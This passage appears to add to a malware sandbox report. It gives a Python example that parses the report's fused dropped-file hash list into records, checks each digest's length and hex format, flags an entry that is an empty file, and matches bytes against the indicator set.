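The dropped-file list above is only useful as an indicator set if it can be loaded reliably, and the raw export fuses each label onto its value ("MD5230f2e...", "Filesize2KB") while sometimes putting the value on the following line. The following Python is an added example, not part of the sandbox report or its tooling: it parses that fused layout into records, validates each digest's length and hex alphabet, flags the entry whose four digests are those of zero-length input, and matches arbitrary bytes against the set. The sample text is a constructed excerpt of three entries copied from the report; everything else (function names, the "-" separator handling, treating an unlabelled line inside an entry as the dropped file's path) is this example's own assumption.

```python
import hashlib
import re

# Constructed excerpt of the report's "Downloads" dump, kept in its raw fused layout.
SAMPLE = r"""Downloads
-
Filesize
47KB
MD5230f2e8c6fa8eee3935356ca122db8ce
SHA10d25a7f01224d87b0a408f6e639432d44b20db65
SHA2564e9d91b0feca6307b850061006f202601154fb0c208306f389810fc8e601e660
SHA512773436cc55584a52243dd715a29d924dac8284bcba6602c7c5a2548c00213c230e27cc991cb6397fb5bda2ecb9f06ad3f5c6deb6f87f14d530138cce1c9e55c8
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize2KB
MD504493ed4421328d5e40252891bfe515a
SHA1ab8a4e3909ff849549ea989049ed30b490f274e7
SHA2563b14b48326a1201fc8b9667201c15392e52f7f5819c2aadafe19cbb72b08be51
SHA512c8ca89143763a72f4ce8f10ffa2e161b59d41454bad0f71fcb4c7e9c8861a5d99bdc787907761bfb8439afad1f0557a1338bbb1054f5810de807633f515d5a76
"""

DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
# Label prefixes differ at the fourth character, so a plain alternation is unambiguous
# even when the value itself starts with a digit ("SHA10d25..." is SHA1 + "0d25...").
LABEL_RE = re.compile(r"^(Filesize|MD5|SHA1|SHA256|SHA512)(.*)$")
# Digests of zero-length input; an entry carrying all four was an empty file.
EMPTY = {name: getattr(hashlib, name.lower())(b"").hexdigest() for name in DIGEST_LEN}


def parse_downloads(text):
    """Turn the fused 'Label<value>' dump into one dict per '-'-separated entry."""
    lines = [ln.strip() for ln in text.splitlines()]
    records, cur, i = [], None, 0
    while i < len(lines):
        ln = lines[i]
        i += 1
        if ln == "-":                      # separator opens a new entry
            cur = {}
            records.append(cur)
            continue
        if cur is None or not ln:          # header text before the first entry, blanks
            continue
        m = LABEL_RE.match(ln)
        if not m:                          # assumption: an unlabelled line is the file path
            cur["path"] = ln
            continue
        label, value = m.group(1), m.group(2)
        if not value and i < len(lines):   # label alone: the value sits on the next line
            value = lines[i]
            i += 1
        cur[label] = value
    return [r for r in records if r]


def validate(record):
    """List problems with an entry: missing digests or wrong length / non-hex digests."""
    problems = []
    for name, length in DIGEST_LEN.items():
        value = record.get(name)
        if value is None:
            problems.append(f"missing {name}")
        elif len(value) != length or not re.fullmatch(r"[0-9a-f]+", value):
            problems.append(f"malformed {name}: {value!r}")
    return problems


def is_empty_file(record):
    """True when every digest equals the digest of b''."""
    return all(record.get(name) == EMPTY[name] for name in DIGEST_LEN)


def match_bytes(data, records):
    """Return the entries whose four digests all equal those of data."""
    digests = {name: getattr(hashlib, name.lower())(data).hexdigest() for name in DIGEST_LEN}
    return [r for r in records if all(r.get(n) == digests[n] for n in DIGEST_LEN)]


if __name__ == "__main__":
    for rec in parse_downloads(SAMPLE):
        note = "EMPTY FILE" if is_empty_file(rec) else (", ".join(validate(rec)) or "ok")
        print(rec.get("path", "<no path>"), rec.get("Filesize", "?"), rec["SHA256"], note)
```

Matching on all four digests rather than SHA256 alone is deliberate: a transcription slip in any one value of a copied indicator list then shows up as a non-match instead of a silent false positive, and `validate` catches the more common failure of a digest that lost or gained a character during extraction.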